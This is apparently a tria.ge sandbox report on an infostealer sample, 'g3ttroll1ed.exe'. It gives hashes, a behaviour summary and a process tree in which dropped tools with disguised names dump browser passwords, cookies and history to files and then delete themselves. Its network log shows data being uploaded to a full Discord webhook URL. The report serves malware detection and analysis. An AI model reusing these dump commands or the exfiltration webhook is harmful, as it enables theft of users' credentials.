Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    359s
  • max time network
    360s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    03/07/2024, 19:54 UTC

General

  • Target

    g3ttroll1ed.exe

  • Size

    4.5MB

  • MD5

    33241a3aadf06404014353cfe3a47bac

  • SHA1

    a0bcbb2e7fde364d8f997b95303cd0c3b2e6b9fb

  • SHA256

    05e06e0f9ea0b245aff5f7aadeb69cce15e162effd29b4eec21bac3418ed414b

  • SHA512

    38e72ba8a3876b6d02606183ef671a566a1ce17f4d4923a4ca8a785b60b7240a0c7e29622dea05d3df176ef316a2712a59eba11d37234b4c34aab64dc98c773d

  • SSDEEP

    98304:/Qf3s64R9ybzUcwti78OqJ7TPBF3ZlHHgkWJ0P39qXSaDv:OzUcwti7TQlF3ZxxWJSUnDv

Score
9/10

Malware Config

Signatures

  • NirSoft WebBrowserPassView 4 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\g3ttroll1ed.exe
    "C:\Users\Admin\AppData\Local\Temp\g3ttroll1ed.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
      "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs60mxdU+lA2BbnUyqaxTaH4Jr31I/RkZECDvIySFqYbrtzscpDOyatJnxFkkqCDIcWouirC6gPXky74iFLNUGrji+iiHogYYHxmZt2qGHNUOVLDC/ED+Aoofqy96tUDWx8=
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1720
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
            C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
            5⤵
            • Executes dropped EXE
            PID:3068
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
            C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3024
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:592
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2416
          • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
            C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
            5⤵
            • Executes dropped EXE
            PID:1936
          • C:\Users\Admin\AppData\Local\Temp\splwow64.exe
            C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
            5⤵
            • Executes dropped EXE
            PID:1772
          • C:\Users\Admin\AppData\Local\Temp\hh.exe
            C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:620
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1668
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1176
          • C:\Users\Admin\AppData\Local\Temp\xwizard.exe
            C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3032
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
        3⤵
          PID:2104
          • C:\Windows\SysWOW64\choice.exe
            choice /C Y /N /D Y /T 3
            4⤵
              PID:2004

      Network

      • flag-us
        DNS
        ipecho.net
        RtkBtManServ.exe
        Remote address:
        8.8.8.8:53
        Request
        ipecho.net
        IN A
        Response
        ipecho.net
        IN A
        34.117.118.44
      • flag-us
        GET
        https://ipecho.net/plain
        RtkBtManServ.exe
        Remote address:
        34.117.118.44:443
        Request
        GET /plain HTTP/1.1
        Host: ipecho.net
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        date: Wed, 03 Jul 2024 19:56:02 GMT
        content-type: text/plain; charset=utf-8
        Content-Length: 14
        access-control-allow-origin: *
        via: 1.1 google
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        discord.com
        RtkBtManServ.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.128.233
      • flag-us
        GET
        https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        GET /api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        accept-encoding: gzip, deflate
        accept: */*
        user-agent: DiscordBot (https://github.com/RogueException/Discord.Net, v2.3.1)
        X-RateLimit-Precision: second
        Host: discord.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 19:56:04 GMT
        Content-Type: application/json
        Transfer-Encoding: chunked
        Connection: keep-alive
        set-cookie: __dcfduid=47af6170397611efbf087eaed2f33127; Expires=Mon, 02-Jul-2029 19:56:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036565
        x-ratelimit-reset-after: 1
        Content-Encoding: gzip
        vary: Accept-Encoding
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qh9sZr7fmU8nFYRvPd7YbvCDymVgCUbI67ONgMVrr9k%2FS4wCMlBtoL%2BKF2jo5sY5VfmskHbF3FD0gxBWfFjuaFBHgbPXpbh1WVbxKMcs%2F4KY6%2B3Xq3a5hyZVh5od"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=47af6170397611efbf087eaed2f331270acf872cd13fff11ecb28f7bbc13507e2714c4af9827463779c8b401ae4e97ef; Expires=Mon, 02-Jul-2029 19:56:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=47aa84c0a1feac8be5f047b79f1b4fba4b87605b-1720036564; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=Zuo2rfF7p1ZkqQ0PcsFZE6TV5ENqWlPG6hIbgnLWxi0-1720036564382-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fce7c40bee4-LHR
      • flag-us
        POST
        https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true HTTP/1.1
        accept-encoding: gzip, deflate
        accept: */*
        user-agent: DiscordBot (https://github.com/RogueException/Discord.Net, v2.3.1)
        X-RateLimit-Precision: second
        Content-Type: application/json; charset=utf-8
        Host: discord.com
        Content-Length: 520
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 19:56:05 GMT
        Content-Type: application/json
        Transfer-Encoding: chunked
        Connection: keep-alive
        set-cookie: __dcfduid=482b7b7a397611efb98ff60d84dba40f; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036566
        x-ratelimit-reset-after: 1
        Content-Encoding: gzip
        vary: Accept-Encoding
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hj2hKiBuLhpQrogGfjQlKmprT7fV9AaBEES1eykyg4E%2FS2FcyoGOvbpeaqYKYbfO8WAhhGFg%2FY1j4js0kuM4jAOmsH4n%2FeSkIZ78xaj0TP%2FtI3W3YFRMHrS1t9B"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=482b7b7a397611efb98ff60d84dba40f762ab5729c5c51938a87cc7a6da2cdcd0329c9d9b90112a908c68c4c9b7d237b; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=a7155535eb7a71d360e6889177a250d519b96dfc-1720036565; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=_tPICxlZgC_T0QSvQLhuluXjDqT8PZGtmIAn6Arb0Ww-1720036565198-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fd0ee97bee4-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="1a0443dd-804d-4acc-a8ab-e7f02a9c9c4c"
        Host: discord.com
        Content-Length: 368431
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:05 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=483f5ec4397611ef9f0416be8cfb3c76; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036566
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6GfJFoZGbCJnCrXFoFJf%2FTfC1st1GgO5QnXh7zNxGXLHTdPMzjb2SnicOD4%2F2YCrzrvoyTTUq2xVJx1IHN%2Fvqp%2BPiK2upW%2B4ZrkjouxZwoXXIktx%2BSikwccz2iR"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=483f5ec4397611ef9f0416be8cfb3c76fdb4c4820028e06f53ec0967a8b231aa8c9af25ebe90e2150c1890ced727b25c; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=188c066c3647d4a57708bc395e37a04013e75430-1720036565; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=oH3zDmHFBQS64dlYtahqxl_zvF0Q5tMXU3uFnB5PJrs-1720036565326-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fd23a2c23fb-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="4ea13809-d8c9-42cc-bc8d-127405d9fecd"
        Host: discord.com
        Content-Length: 455
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:08 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=49da900a397611efbaa8a25183378f37; Expires=Mon, 02-Jul-2029 19:56:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036569
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KRIZ3WtjRzgvJMjdLYdwfJGiWg%2FETJ6ioA1LeMmQYzFcB2orvxucRSAE0WC1fmtCFVGcoMELcOq7Hv3XOgkptLFu9N7vxoo3ZiLFBoj%2BnDrfTmNapNdOllXPOfdv"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=49da900a397611efbaa8a25183378f3754e3c6de08b2a801a24a671ee34d3e7f6ca78cb969c3129e152ee752dc66f6e2; Expires=Mon, 02-Jul-2029 19:56:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=eeb6cabf9f63ef119045574109bc4618299bdd41-1720036568; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=2Cjuya6jPiwm0eM75Lswon3ET3Hw0xBNmy.LNkUFhWw-1720036568026-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fe4985363b4-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="db8839ba-acd1-48ed-90b9-a4393cb5ca3a"
        Host: discord.com
        Content-Length: 462
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:13 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=4d2fd044397611ef8e06a67e1ed0292d; Expires=Mon, 02-Jul-2029 19:56:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036574
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUTtW4CL846XuyUq5DoLGzuFjHGPi3q9qYN7LADcMHUt1IQz6fvTBl3XLy%2F4P%2F29wh%2BidmZW%2FEv6yphdL2VeuOVvWvfmR7zkw2BmJN%2F%2B5lNMzj1ebrfYiwm35bF0"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=4d2fd044397611ef8e06a67e1ed0292d5596eda44e5431f536baa5bf47fbb5c7a3148a1d94f3e80642b3472bd3c25d01; Expires=Mon, 02-Jul-2029 19:56:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=5bdeecd79c70443ed1c40ba2295bda964af918ae-1720036573; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=n2NCQUJojVbVgasCr0dNgYZO4LcBR0CdsT6UcNlX01E-1720036573620-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d97007594d63b5-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="9c256634-4335-44c8-8781-0cfc3eec09cf"
        Host: discord.com
        Content-Length: 461
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:17 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=4f448b36397611ef8ad682e6eaa6f85b; Expires=Mon, 02-Jul-2029 19:56:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036578
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BsBSSh%2F7tmaHZwOZLCFvEor9tu%2BD79CVPPbq3WPMvaq4r24%2Be8zOgdU7M2sSeAYVw8YMdbjHPMvzcNc%2F5qiTfW6TLSPkEgvffNUn6ElP8ey%2F7PM9PpxCscCLHO5a"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=4f448b36397611ef8ad682e6eaa6f85bd81531477ff65d7bec5f790ff17e2c75941cd19b48d009a79e5f728e40b86bb5; Expires=Mon, 02-Jul-2029 19:56:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=3dee9a72b4209fb25db71067c1fda23a023db7cf-1720036577; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=xugm9ROKIK0G5gX2RL8UYGulecNtuKywfJhuIbEdEdU-1720036577109-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d9701d286971e0-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="21385098-574b-41a5-8157-486d3e580635"
        Host: discord.com
        Content-Length: 461
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:18 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=4fff6988397611efb9a72a3190fcf511; Expires=Mon, 02-Jul-2029 19:56:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036579
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKTzLVuvAND3P3URk56oAT0HkEKLZJIRLuLs728yCK4E3eGmdkDKxexk%2FHIUn5SKgbc0Wo%2B9tIKoRdpWIlHRLn6omdJh7Klzo2Nbhe2BssvxoMi1OML70RZ3Q5Ul"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=4fff6988397611efb9a72a3190fcf5112bfaa8efb7e8bbea6523da6687784909bce23395445f5f6d1738635b9df13536; Expires=Mon, 02-Jul-2029 19:56:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=ff5eaac4af45193d4984f65a7a6b71b5da34e700-1720036578; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=DZveBxOUvBvHV5DZ_yiJhrdAt96hVuE3RKkoqGGEKGA-1720036578331-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d970250c4c88bc-LHR
      • 34.117.118.44:443
        https://ipecho.net/plain
        tls, http
        RtkBtManServ.exe
        775 B
        3.9kB
        8
        8

        HTTP Request

        GET https://ipecho.net/plain

        HTTP Response

        200
      • 162.159.137.232:443
        https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true
        tls, http
        RtkBtManServ.exe
        2.3kB
        7.7kB
        15
        18

        HTTP Request

        GET https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        200

        HTTP Request

        POST https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true

        HTTP Response

        200
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        381.4kB
        10.1kB
        288
        142

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.7kB
        4.8kB
        11
        11

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.6kB
        2.3kB
        9
        9

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.7kB
        4.8kB
        11
        11

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.7kB
        4.8kB
        11
        11

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 8.8.8.8:53
        ipecho.net
        dns
        RtkBtManServ.exe
        56 B
        72 B
        1
        1

        DNS Request

        ipecho.net

        DNS Response

        34.117.118.44

      • 8.8.8.8:53
        discord.com
        dns
        RtkBtManServ.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.137.232
        162.159.138.232
        162.159.136.232
        162.159.135.232
        162.159.128.233

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

